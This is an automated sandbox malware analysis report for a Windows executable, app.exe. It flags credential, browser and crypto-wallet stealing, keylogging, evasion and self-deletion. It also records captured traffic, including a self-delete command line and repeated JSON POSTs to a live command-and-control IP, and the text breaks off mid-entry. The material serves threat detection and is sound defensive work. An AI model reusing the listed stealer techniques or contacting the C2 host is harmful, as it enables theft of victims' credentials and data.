Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
app.exe

Overview

General Information

Sample name:app.exe
Analysis ID:1436386
MD5:75b9ef9142a78671d449c8d22ab6be14
SHA1:0461f1c46644acde8020bb59b53b1e34b65977ca
SHA256:e9bc44cf548a70e7285499209973faf44b7374dece1413dfcdc03bf25a6c599c
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains functionality to infect the boot sector
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Self deletion via cmd or bat file
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • app.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\app.exe" MD5: 75B9EF9142A78671D449C8D22AB6BE14)
    • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • app.exe (PID: 7132 cmdline: "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe" MD5: 75B9EF9142A78671D449C8D22AB6BE14)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 1808 cmdline: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • timeout.exe (PID: 1172 cmdline: timeout /t 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

Timestamp:05/05/24-00:24:50.450010
SID:2051909
Source Port:80
Destination Port:49789
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeVirustotal: Detection: 11%Perma Link
Multi AV Scanner detection for submitted file
Source: app.exeVirustotal: Detection: 11%Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: app.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D04D0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,TlsSetValue,HeapFree,TlsSetValue,0_2_025D04D0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D04C0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,0_2_025D04C0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A04D0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,TlsSetValue,HeapFree,TlsSetValue,3_2_025A04D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255EB69 HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,CloseHandle,HeapFree,HeapFree,ReadFile,ReadFile,CryptUnprotectData,CryptUnprotectData,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,HeapFree,ReadFile,ReadFile,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,GetLastError,HeapFree,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,3_2_0255EB69
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A04C0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,3_2_025A04C0

Compliance

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\app.exeUnpacked PE file: 0.2.app.exe.2560000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeUnpacked PE file: 3.2.app.exe.2530000.2.unpack
Source: app.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:49788 version: TLS 1.2
Source: Binary string: SRLPR.pdBf source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: grabg::C:\\Users\\user\\Desktop\\GQSZOBXUFX\\RMDIWSRLPR.pdBfGbodyFUk1ESVdTU source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GQSZOBXUFX\\RMDIWSRLPR.pdBfIbodyHUk1ESVdTU source: app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00427361 GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_00427361
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025CA710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,0_2_025CA710
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025E4B93 FindFirstFileExW,0_2_025E4B93
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259A710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,3_2_0259A710
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259FEC0 HeapFree,HeapFree,HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,3_2_0259FEC0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025B4B93 FindFirstFileExW,3_2_025B4B93

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2051909 ET TROJAN Win32/FireStealer Related Server Response 144.208.127.230:80 -> 192.168.11.20:49789
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewASN Name: SHOCK-1US SHOCK-1US
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.ipify.org
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 451Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 996Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1008Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1007Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 992Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1004Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1002Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1005Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1000Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 999Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 998Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 992Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 995Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 999Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1010Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1010Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 994Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1006Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1005Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1008Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1002Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1002Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1001Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 996Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 998Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 185Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 993Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1001Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1000Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1000Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 995Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 997Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1003Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1013Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1014Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 998Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1010Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1009Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1012Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1006Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1006Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1005Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1001Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1002Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 100842Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 29428Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 57241Host: 144.208.127.230
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 1270200Host: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: unknownTCP traffic detected without corresponding DNS query: 144.208.127.230
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.ipify.org
Source: app.exe, 00000003.00000003.3182148991.00000000055CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: app.exe, 00000003.00000003.3182148991.00000000055CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 451Host: 144.208.127.230
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230
Source: app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.0000000000950000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000091F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3141697165.000000000559A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246373817.000000000094A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242018626.0000000005596000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3185017394.0000000005596000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3099980672.0000000000950000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3262410113.0000000005596000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3137031558.000000000558E000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3125985144.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3099980672.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246373817.0000000000950000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.000000000094A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246373817.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005591000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3101657336.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found 